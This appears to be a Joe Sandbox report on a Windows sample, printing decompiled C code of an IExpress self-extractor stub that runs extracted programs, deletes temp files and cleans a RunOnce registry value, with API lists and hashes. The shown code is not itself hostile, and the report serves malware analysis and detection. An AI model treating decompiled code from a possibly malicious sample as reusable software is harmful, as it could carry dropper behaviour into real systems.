                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                    • API String ID: 747627703-188559970
                                                                                                                                                                                                    • Opcode ID: bd5f53341375794b5fb6e363b500bac4753070733e0994a4ec8c234c6be8668f
                                                                                                                                                                                                    • Instruction ID: 646eebc9e16c2eeb59cc6f4639fc7da79fe192ac3ceddc6aa8d4247a691004c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd5f53341375794b5fb6e363b500bac4753070733e0994a4ec8c234c6be8668f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6110471700210BBD7245F7AAC4DB9B7E9EEF46774F104629F58AE31D1CBB0984587A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 675 133fef-134010 676 134016-13403b CreateProcessA 675->676 677 13410a-13411a call 136ce0 675->677 678 134041-13406e WaitForSingleObject GetExitCodeProcess 676->678 679 1340c4-134101 call 136285 GetLastError FormatMessageA call 1344b9 676->679 682 134091 call 13411b 678->682 683 134070-134077 678->683 691 134106 679->691 690 134096-1340b8 CloseHandle * 2 682->690 683->682 686 134079-13407b 683->686 686->682 689 13407d-134089 686->689 689->682 692 13408b 689->692 693 1340ba-1340c0 690->693 694 134108 690->694 691->694 692->682 693->694 695 1340c2 693->695 694->677 695->691
                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                    			E00133FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                    				long _v528;
                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t45 = __edx;
                                                                                                                                                                                                    				_t20 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                    				_t39 = __ecx;
                                                                                                                                                                                                    				_t49 = 1;
                                                                                                                                                                                                    				_t22 = 0;
                                                                                                                                                                                                    				if(__ecx == 0) {
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return E00136CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                    				if(_t25 == 0) {
                                                                                                                                                                                                    					 *0x139124 = E00136285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                    					_t45 = 0x4c4;
                                                                                                                                                                                                    					E001344B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					_t49 = 0;
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t22 = _t49;
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                    				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                    				_t44 = _v528;
                                                                                                                                                                                                    				_t53 =  *0x138a28; // 0x0
                                                                                                                                                                                                    				if(_t53 == 0) {
                                                                                                                                                                                                    					_t34 =  *0x139a2c; // 0x0
                                                                                                                                                                                                    					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                    						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                    						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                    							 *0x139a2c = _t44;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E0013411B(_t34, _t44);
                                                                                                                                                                                                    				CloseHandle(_v544.hThread);
                                                                                                                                                                                                    				CloseHandle(_v544);
                                                                                                                                                                                                    				if(( *0x139a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00133fef
                                                                                                                                                                                                    0x00133ffa
                                                                                                                                                                                                    0x00134001
                                                                                                                                                                                                    0x00134008
                                                                                                                                                                                                    0x0013400a
                                                                                                                                                                                                    0x0013400b
                                                                                                                                                                                                    0x00134010
                                                                                                                                                                                                    0x0013410a
                                                                                                                                                                                                    0x0013411a
                                                                                                                                                                                                    0x0013411a
                                                                                                                                                                                                    0x0013401c
                                                                                                                                                                                                    0x0013401d
                                                                                                                                                                                                    0x0013401e
                                                                                                                                                                                                    0x0013401f
                                                                                                                                                                                                    0x00134033
                                                                                                                                                                                                    0x0013403b
                                                                                                                                                                                                    0x001340ca
                                                                                                                                                                                                    0x001340e9
                                                                                                                                                                                                    0x001340f8
                                                                                                                                                                                                    0x00134101
                                                                                                                                                                                                    0x00134106
                                                                                                                                                                                                    0x00134106
                                                                                                                                                                                                    0x00134108
                                                                                                                                                                                                    0x00134108
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134108
                                                                                                                                                                                                    0x00134049
                                                                                                                                                                                                    0x0013405c
                                                                                                                                                                                                    0x00134062
                                                                                                                                                                                                    0x00134068
                                                                                                                                                                                                    0x0013406e
                                                                                                                                                                                                    0x00134070
                                                                                                                                                                                                    0x00134077
                                                                                                                                                                                                    0x0013407f
                                                                                                                                                                                                    0x00134089
                                                                                                                                                                                                    0x0013408b
                                                                                                                                                                                                    0x0013408b
                                                                                                                                                                                                    0x00134089
                                                                                                                                                                                                    0x00134077
                                                                                                                                                                                                    0x00134091
                                                                                                                                                                                                    0x0013409c
                                                                                                                                                                                                    0x001340a8
                                                                                                                                                                                                    0x001340b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001340c2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001340c2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateProcessA.KERNELBASE ref: 00134033
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00134049
                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 0013405C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0013409C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001340A8
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001340DC
                                                                                                                                                                                                    • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001340E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                    • Opcode ID: 7b9cddb84f239933bbfc6516e4d8fb43e1eef9c215baf4b7c4c2f9c2c59b6062
                                                                                                                                                                                                    • Instruction ID: 1647aa0a386e5225a750841e4bddbdd491d7e3a8de065cd908ea1b8e600729b1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b9cddb84f239933bbfc6516e4d8fb43e1eef9c215baf4b7c4c2f9c2c59b6062
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D31CE31640218ABEB209B65DC48FAB777CEBA4710F2001A9F685E25A0CB70ADC5CB21
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001351E5(void* __eflags) {
                                                                                                                                                                                                    				int _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = E0013468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                    					if(E0013468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                    						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                    						if(_t5 != 0) {
                                                                                                                                                                                                    							_t6 = E001344B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                    							LocalFree(_t28);
                                                                                                                                                                                                    							if(_t6 != 6) {
                                                                                                                                                                                                    								 *0x139124 = 0x800704c7;
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *0x139124 = 0;
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t28);
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree(_t28);
                                                                                                                                                                                                    					 *0x139124 = 0x80070714;
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0x139124 = E00136285();
                                                                                                                                                                                                    				goto L10;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x001351fb
                                                                                                                                                                                                    0x00135207
                                                                                                                                                                                                    0x0013520b
                                                                                                                                                                                                    0x0013523c
                                                                                                                                                                                                    0x00135268
                                                                                                                                                                                                    0x00135270
                                                                                                                                                                                                    0x0013528b
                                                                                                                                                                                                    0x00135293
                                                                                                                                                                                                    0x0013529c
                                                                                                                                                                                                    0x001352a6
                                                                                                                                                                                                    0x001352b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001352b0
                                                                                                                                                                                                    0x0013529e
                                                                                                                                                                                                    0x00135279
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013527b
                                                                                                                                                                                                    0x00135273
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135273
                                                                                                                                                                                                    0x0013524a
                                                                                                                                                                                                    0x00135250
                                                                                                                                                                                                    0x00135256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135256
                                                                                                                                                                                                    0x00135219
                                                                                                                                                                                                    0x00135223
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00132F4D,?,00000002,00000000), ref: 00135201
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00135250
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                      • Part of subcall function 00136285: GetLastError.KERNEL32(00135BBC), ref: 00136285
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: c8b96a161ff0a969efc34c7e1d781c837ec2399e4f5d959d1cadb005014f4608
                                                                                                                                                                                                    • Instruction ID: 64b06a0bb0c31a70615b2c46ebcab393bf04d3ab3bcfde0842bf38877d635a38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8b96a161ff0a969efc34c7e1d781c837ec2399e4f5d959d1cadb005014f4608
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC1101B1200201FFE3286BB15C4AF3B759EEF98BA0F514029F682E6590DBB8DC405234
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E001352B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR** _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_t31 =  *0x1391e0; // 0x3078e20
                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t29 = _t31;
                                                                                                                                                                                                    						if( *0x138a24 == 0 &&  *0x139a30 == 0) {
                                                                                                                                                                                                    							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                    							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t31 = _t31[1];
                                                                                                                                                                                                    						LocalFree( *_t29);
                                                                                                                                                                                                    						LocalFree(_t29);
                                                                                                                                                                                                    					} while (_t31 != 0);
                                                                                                                                                                                                    					_pop(_t28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 =  *0x138a20; // 0x0
                                                                                                                                                                                                    				_pop(_t32);
                                                                                                                                                                                                    				if(_t11 != 0 &&  *0x138a24 == 0 &&  *0x139a30 == 0) {
                                                                                                                                                                                                    					_push(_t22);
                                                                                                                                                                                                    					E00131781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    					if(( *0x139a34 & 0x00000020) != 0) {
                                                                                                                                                                                                    						E001365E8( &_v268);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                    					_t22 =  &_v268;
                                                                                                                                                                                                    					E00132390( &_v268);
                                                                                                                                                                                                    					_t11 =  *0x138a20; // 0x0
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *0x139a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                    					_t11 = E00131FE1(_t22); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *0x138a20 =  *0x138a20 & 0x00000000;
                                                                                                                                                                                                    				return E00136CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x001352b6
                                                                                                                                                                                                    0x001352b6
                                                                                                                                                                                                    0x001352b6
                                                                                                                                                                                                    0x001352c1
                                                                                                                                                                                                    0x001352c8
                                                                                                                                                                                                    0x001352cb
                                                                                                                                                                                                    0x001352cc
                                                                                                                                                                                                    0x001352d4
                                                                                                                                                                                                    0x001352d6
                                                                                                                                                                                                    0x001352d7
                                                                                                                                                                                                    0x001352de
                                                                                                                                                                                                    0x001352e0
                                                                                                                                                                                                    0x001352f2
                                                                                                                                                                                                    0x001352fa
                                                                                                                                                                                                    0x001352fa
                                                                                                                                                                                                    0x00135302
                                                                                                                                                                                                    0x00135305
                                                                                                                                                                                                    0x0013530c
                                                                                                                                                                                                    0x00135312
                                                                                                                                                                                                    0x00135316
                                                                                                                                                                                                    0x00135316
                                                                                                                                                                                                    0x00135317
                                                                                                                                                                                                    0x0013531c
                                                                                                                                                                                                    0x0013531f
                                                                                                                                                                                                    0x00135333
                                                                                                                                                                                                    0x00135345
                                                                                                                                                                                                    0x00135351
                                                                                                                                                                                                    0x00135359
                                                                                                                                                                                                    0x00135359
                                                                                                                                                                                                    0x00135363
                                                                                                                                                                                                    0x00135369
                                                                                                                                                                                                    0x0013536f
                                                                                                                                                                                                    0x00135374
                                                                                                                                                                                                    0x00135374
                                                                                                                                                                                                    0x00135381
                                                                                                                                                                                                    0x00135387
                                                                                                                                                                                                    0x00135387
                                                                                                                                                                                                    0x0013538f
                                                                                                                                                                                                    0x001353a0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(03078E20,00000080,?,00000000), ref: 001352F2
                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(03078E20), ref: 001352FA
                                                                                                                                                                                                    • LocalFree.KERNEL32(03078E20,?,00000000), ref: 00135305
                                                                                                                                                                                                    • LocalFree.KERNEL32(03078E20), ref: 0013530C
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(001311FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00135363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00135334
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    • API String ID: 2833751637-3290032183
                                                                                                                                                                                                    • Opcode ID: 7bd2ae274a8f9cd69870f68f2e600b9d4c16034fd4a34e8ee4fcb32a0a404937
                                                                                                                                                                                                    • Instruction ID: ba2cf641b1c6554f9b952be9493f5bbba40dcb44230dd5438bf7306efd6b56dc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bd2ae274a8f9cd69870f68f2e600b9d4c16034fd4a34e8ee4fcb32a0a404937
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7821D231900614DFDB34AB20EC49BA977B5BF14B90F440259F886539A0CFF09DC8DB80
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00131FE1(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if( *0x138530 != 0) {
                                                                                                                                                                                                    					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                    						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                    						return RegCloseKey(_v8);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x00131fee
                                                                                                                                                                                                    0x00132005
                                                                                                                                                                                                    0x0013200d
                                                                                                                                                                                                    0x00132017
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132020
                                                                                                                                                                                                    0x0013200d
                                                                                                                                                                                                    0x00132029

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0013538C,?,?,0013538C), ref: 00132005
                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0013538C,wextract_cleanup2,?,?,0013538C), ref: 00132017
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0013538C,?,?,0013538C), ref: 00132020
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                    • API String ID: 849931509-3354236729
                                                                                                                                                                                                    • Opcode ID: e724f086ef428369c2ee4014e42229a5aa92f30e4d19f692cdc3f7b893ce3865
                                                                                                                                                                                                    • Instruction ID: ab2e1473d14fdae926eb6b0052391ab5dcf7b62c309d601719e24ebc39ff9125
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e724f086ef428369c2ee4014e42229a5aa92f30e4d19f692cdc3f7b893ce3865
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9E08631550318BBD7299F90ED4AF5D7B29FB01740F500194F944A04A0EBB15E94D605
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00134CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				long _t44;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				long _t46;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				long _t51;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                    				CHAR* _t74;
                                                                                                                                                                                                    				int _t75;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                    				_v8 = _t30;
                                                                                                                                                                                                    				_t75 = _a8;
                                                                                                                                                                                                    				if( *0x1391d8 == 0) {
                                                                                                                                                                                                    					_t32 = _a4;
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                    						_t33 = E00134E99(_t75);
                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                    						return E00136CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t35 = _t32 - 1;
                                                                                                                                                                                                    					__eflags = _t35;
                                                                                                                                                                                                    					if(_t35 == 0) {
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t36 = _t35 - 1;
                                                                                                                                                                                                    					__eflags = _t36;
                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                    						_t37 =  *0x138584; // 0x0
                                                                                                                                                                                                    						__eflags = _t37;
                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                    							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t54 = 0x1391e4;
                                                                                                                                                                                                    						_t58 = 0x1391e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t38 =  *_t58;
                                                                                                                                                                                                    							_t58 =  &(_t58[1]);
                                                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                                                    						} while (_t38 != 0);
                                                                                                                                                                                                    						_t59 = _t58 - 0x1391e5;
                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                    						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t73 =  &(_t71[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t39 =  *_t71;
                                                                                                                                                                                                    							_t71 =  &(_t71[1]);
                                                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                                                    						} while (_t39 != 0);
                                                                                                                                                                                                    						_t69 = _t71 - _t73;
                                                                                                                                                                                                    						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
